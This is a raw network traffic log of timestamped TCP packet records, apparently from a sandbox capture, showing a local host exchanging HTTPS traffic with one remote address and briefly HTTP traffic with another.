Mar 24, 2025 17:33:12.386423111 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.386431932 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.386467934 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.386480093 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.386497021 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.386517048 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.386534929 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.386578083 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.391643047 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.391676903 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.391685009 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.391706944 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.391710043 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.391720057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.391802073 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.436417103 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.506928921 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.506942034 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.506975889 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.507009029 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.507029057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.507038116 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.507042885 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.507061005 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.507102013 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.596549988 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.596570969 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.596616983 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.596673012 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.596673012 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.596689939 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.622705936 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.622729063 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.622914076 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.622914076 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.622942924 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.670799017 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.736665010 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.736675024 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.736711979 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.736740112 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.736743927 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.736757040 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.736803055 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.737299919 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.740544081 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.740557909 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.740606070 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.740631104 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.740643024 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.740679979 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.795802116 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.857490063 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.857497931 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.857526064 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.857552052 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.857558966 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.857566118 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.857579947 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.857629061 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.908077955 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.908090115 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.908118963 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.908160925 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.908179998 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.908216953 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.908233881 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.948620081 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.978148937 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.978167057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.978305101 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.978328943 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.030205011 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.030230999 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.077085018 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.092885971 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.092895031 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.092936993 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.092950106 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.093004942 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.093025923 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.093058109 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.093069077 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.094811916 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.097774029 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.097809076 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.097819090 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.097840071 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.097850084 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.097862959 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.097867966 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.097888947 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.139602900 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.139632940 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.186518908 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.212493896 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.212503910 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.212551117 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.212563992 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.212579966 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.212625027 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.212651968 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.212685108 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.216624975 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.216665030 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.216675043 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.216686010 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.216700077 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.216721058 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.216742039 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.264631033 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.267736912 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.311424017 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.330566883 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.330575943 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.330647945 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.330672026 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.330673933 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.330738068 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.330754042 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.373994112 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.387788057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.387810946 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.387851954 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.387871027 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.387928963 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.387947083 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.387978077 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.388001919 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.388005972 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.436479092 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.449773073 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.449793100 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.449834108 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.449846983 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.449867010 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.449894905 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.449908972 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.449995041 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.508523941 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.508534908 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.508594990 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.508610964 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.508673906 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.508693933 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.508729935 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.561522007 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.571424961 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.571435928 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.571501970 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.571537018 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.571546078 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.571552038 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.571574926 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.571592093 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.571592093 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.623986959 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.624609947 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.624622107 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.624661922 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.624690056 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.624717951 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.624732971 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.624773026 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.624783039 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.656804085 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.688862085 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.688882113 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.688915968 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.688981056 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.689007998 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.689022064 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.733349085 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.733361959 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.780194044 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.802079916 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.802092075 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.802145958 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.802172899 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.802195072 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.802208900 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.802222967 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.802244902 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.802263975 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.809185982 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.809210062 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.809271097 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.809297085 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.809304953 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.809314013 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.809319019 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.809319973 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.809350967 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.809370041 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.905687094 CET	80	49729	3.128.172.139	192.168.2.8
Mar 24, 2025 17:33:13.905774117 CET	49729	80	192.168.2.8	3.128.172.139
Mar 24, 2025 17:33:13.905846119 CET	49729	80	192.168.2.8	3.128.172.139
Mar 24, 2025 17:33:13.920758963 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.920779943 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.920808077 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.920947075 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.920947075 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:13.920964003 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:13.967731953 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.020184994 CET	80	49729	3.128.172.139	192.168.2.8
Mar 24, 2025 17:33:14.044476032 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044488907 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044536114 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044567108 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044581890 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044610023 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044645071 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044655085 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.044656038 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044668913 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.044723034 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.092258930 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.092278957 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.092314959 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.092430115 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.092444897 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.092494965 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.209837914 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.209868908 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.209994078 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.210024118 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.210068941 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.323174000 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.323213100 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.323246002 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.323267937 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.323292971 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.323316097 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.373934031 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.391839027 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.391861916 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.391890049 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.391916990 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.391942024 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.391972065 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.436410904 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.511132956 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.511142969 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.511254072 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.511261940 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.511305094 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.511315107 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.511321068 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.511396885 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.634860039 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.634882927 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.634927988 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.635114908 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.635114908 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.635133028 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.686534882 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.745106936 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.745120049 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.745165110 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.745199919 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.745203018 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.745237112 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.745260000 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.795928001 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.798612118 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.798623085 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.798666954 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.798674107 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.798729897 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.798743963 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.798798084 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.917303085 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.917314053 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.917359114 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.917388916 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.917664051 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:14.917690992 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:14.967834949 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.155287981 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155304909 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155323982 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155354977 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155370951 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155426025 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155448914 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155458927 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155467033 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155478954 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.155478954 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.155508041 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.155531883 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.155531883 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.155548096 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.155821085 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.202097893 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.271872997 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.271883965 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.271918058 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.271954060 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.271979094 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.271996021 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.272013903 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.272042990 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.342557907 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.389609098 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.464087963 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.464098930 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.464149952 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.464174986 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.464179993 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.464181900 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.464204073 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.464234114 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.514601946 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.593775988 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.593785048 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.593806982 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.593816042 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.593846083 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.593863010 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.593890905 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.593914032 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.639619112 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.711838007 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.711848974 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.711868048 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.711875916 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.711896896 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.711956024 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.711965084 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.712009907 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.749730110 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.795880079 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.869664907 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.869677067 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.869729996 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.869745970 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.869764090 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:15.869818926 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:15.869846106 CET	443	49730	3.5.129.15	192.168.2.8
